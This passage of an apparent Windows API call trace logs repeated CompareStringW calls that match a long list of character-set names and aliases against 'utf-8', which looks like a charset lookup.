lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO87JISX0208", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="greek7", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-88", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO88Greek7", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ASMO_449", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_9036", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="arabic7", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-89", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO89ASMO449", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-90", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO90", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-a", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-91", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-a", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO91JISC62291984a", cchCount1=20, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-b", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-92", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-JP-OCR-B", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-b", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO92JISC62991984b", cchCount1=20, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-b-add", cchCount1=20, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-93", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-b-add", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO93JIS62291984badd", cchCount1=22, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-hand", cchCount1=19, lpString2="utf-8", cchCount2=5) returned 1 [0221.718] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-94", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-hand", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO94JIS62291984hand", cchCount1=22, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-hand-add", cchCount1=23, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-95", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jp-ocr-hand-add", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO95JIS62291984handadd", cchCount1=25, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JIS_C6229-1984-kana", cchCount1=19, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-96", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO96JISC62291984kana", cchCount1=23, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_2033-1983", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-98", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e13b", cchCount1=4, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO2033", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ANSI_X3.110-1983", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-99", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CSA_T500-1983", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NAPLPS", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO99NAPLPS", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-1", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-1:1987", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-100", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-1", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin1", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l1", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IBM819", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CP819", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatin1", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.719] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-2", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-2:1987", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-101", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-2", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin2", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l2", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatin2", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.61-7bit", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-102", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO102T617bit", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.61-8bit", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.61", cchCount1=4, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-103", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO103T618bit", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-3", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-3:1988", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-109", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-3", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin3", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l3", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatin3", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-4", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-4:1988", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-110", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-4", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin4", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l4", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatin4", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ECMA-cyrillic", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-111", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KOI8-E", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO111ECMACyrillic", cchCount1=20, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CSA_Z243.4-1985-1", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-121", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-CA", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csa7-1", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ca", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO121Canadian1", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CSA_Z243.4-1985-2", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-122", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-CA2", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csa7-2", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO122Canadian2", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CSA_Z243.4-1985-gr", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-123", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO123CSAZ24341985gr", cchCount1=22, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-6", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-6:1987", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-127", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-6", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ECMA-114", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ASMO-708", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="arabic", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatinArabic", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-6-E", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-6-E", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO88596E", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-6-I", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-6-I", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO88596I", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-7", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-7:1987", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-126", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-7", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELOT_928", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ECMA-118", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="greek", cchCount1=5, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="greek8", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatinGreek", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="T.101-G2", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-128", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO128T101G2", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-8", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-8:1988", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-138", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-8", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hebrew", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatinHebrew", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-8-E", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-8-E", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO88598E", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-8-I", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-8-I", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO88598I", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CSN_369103", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-139", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO139CSN369103", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JUS_I.B1.002", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-141", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-YU", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="js", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yu", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 3 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO141JUSIB1002", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_6937-2-add", cchCount1=14, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-142", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOTextComm", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IEC_P27-1", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-143", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO143IECP271", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-5", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-5:1988", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-144", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-5", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cyrillic", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatinCyrillic", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JUS_I.B1.003-serb", cchCount1=17, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-146", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="serbian", cchCount1=7, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO146Serbian", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JUS_I.B1.003-mac", cchCount1=16, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="macedonian", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-147", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO147Macedonian", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO-8859-9", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-9:1989", cchCount1=15, lpString2="utf-8", cchCount2=5) returned 1 [0221.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-148", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-9", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="latin5", cchCount1=6, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l5", cchCount1=2, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISOLatin5", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="greek-ccitt", cchCount1=11, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-150", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO150", cchCount1=8, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO150GreekCCITT", cchCount1=18, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NC_NC00-10:81", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuba", cchCount1=4, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-151", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO646-CU", cchCount1=9, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO151Cuba", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_6937-2-25", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-152", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO6937Add", cchCount1=12, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GOST_19768-74", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ST_SEV_358-88", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iso-ir-153", cchCount1=10, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csISO153GOST1976874", cchCount1=19, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISO_8859-supp", cchCount1=13, lpString2="utf-8", cchCount2=5) returned 1 [0221.724] 